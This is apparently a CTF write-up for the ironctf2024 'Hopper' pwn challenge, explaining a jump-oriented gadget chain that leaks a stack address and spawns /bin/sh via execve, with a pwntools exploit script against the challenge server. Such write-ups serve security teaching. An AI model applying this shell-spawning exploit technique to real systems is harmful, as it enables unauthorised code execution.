Tags: pwn 


# Hopper
## Description
Hippety-hop... Hippety-hop your way to victory!

Ctf: ironctf2024 https://ctf.1nf1n1ty.team/challenges#Hopper-15

Author: Vigneswar

Category: pwn

`nc pwn.1nf1n1ty.team 31886`

## Writeup
### Overview
In this challenge we are given only binary without source code so we need to make use of IDA free to see what this binary does.
But first we check what is this file using `file` program
we also `checksec` to find out what security features does this binary have
from this we could say that this is nearly perfect binary for pwning, but life is not all roses and we cannot execute code from the stack.
Lets take look at what is inside, shall we?


there is not even main function in this programme so we take a look at `start` .
What it does is:
- print a bunny ascii image
- print retaddr (very important for us)
- print "hop hop" as ascii image
- takes our input to a stack
- jumps to an address that that is at the top of our input

Why is this retaddr important for us?
Thanks to it we can find out where is stack located, and we can reference addresses according to this leaked address.
Luckily for us we are provided some gadgets that can help us exploit this challenge.

### Plan for an exploit
Since we cannot execute the code from the stack we need to use provided gadgets to execute `syscall` of `execve`. What this means is we have to set some registers according to requirements

- `RAX` has to be `0x3B`
- `RDI` has to be pointer to the beginning of `/bin/sh` string
- `RSI` has to be `0`
- `RDX` has to be `0`
and we need to execute `syscall` after that

How do we control the flow of the programme using those gadgets?
If we put address of dispatcher in `r15` (address that is jumped to at the end of most of the gadgets) we can use it to jump to some gadget like


and then jump back to `r15` - dispatcher
what dispatcher does is it increases value in `rbx` by `8` and jumps to address that is pointed by address in this register. So we can essentially use it to walk the gadgets of which we put addresses on the stack.
### Actual exploit
In order to do that we can put an address of gadgets at the top:
- address of `gadgets` gets popped of to `rsi`
- address of `/bin/sh\x00` gets popped of to `rdi`
- address of we leaked earlier gets popped of to `rbx` (this is the address that will be used by dispatcher)
- value of `0x3B` gets popped of to `r13`
- address of `dispacher` gets popped to `r15`
- we jump to `disparcher`
- `dispacher` jumps to itself
- `dispatcher` jumps to gadgets that clears `rsi`
- `dispatcher` jumps to `xchg rax, r13` to set rax to be `0x3b`
- from there we jump to address that is at `rsp`
- from `dispatcher` we once again clear `rsi`
- from `dispatcher` we once again clear `rdx`
- finally we jump to `syscall`

from pwn import remote, p64, u64

conn = remote("pwn.1nf1n1ty.team", 31886)

msg = conn.recvuntil(b'>>')
addr = msg[379: 379 + 8]

addr_int = u64(addr)
bin_sh_addr = addr_int + 8 * 6

gadget_chain = 0x401017
dispatcher_addr = 0x401011
xor_rsi = 0x401027
xchg_rax_r13 = 0x40100c
xor_rdx = 0x401021
syscall = 0x40100a

payload = p64(gadget_chain)
payload += p64(bin_sh_addr) # rdi
payload += p64(addr_int) # rbx
payload += p64(0x3b) # r13 (later rax)
payload += p64(dispatcher_addr) # r15 dispatcher
payload += p64(xor_rsi) # clear rsi
payload += p64(xchg_rax_r13) # swap rax and r13
payload += p64(xor_rdx) # clear rdx
payload += p64(syscall) # syscall
payload += b'/bin/sh\x00'

### Pro tip
if you don't include null byte at the end of `/bin/sh` you might find yourself debugging for few additional hours

Original writeup (https://kliprmimo.github.io/posts/Hopper/).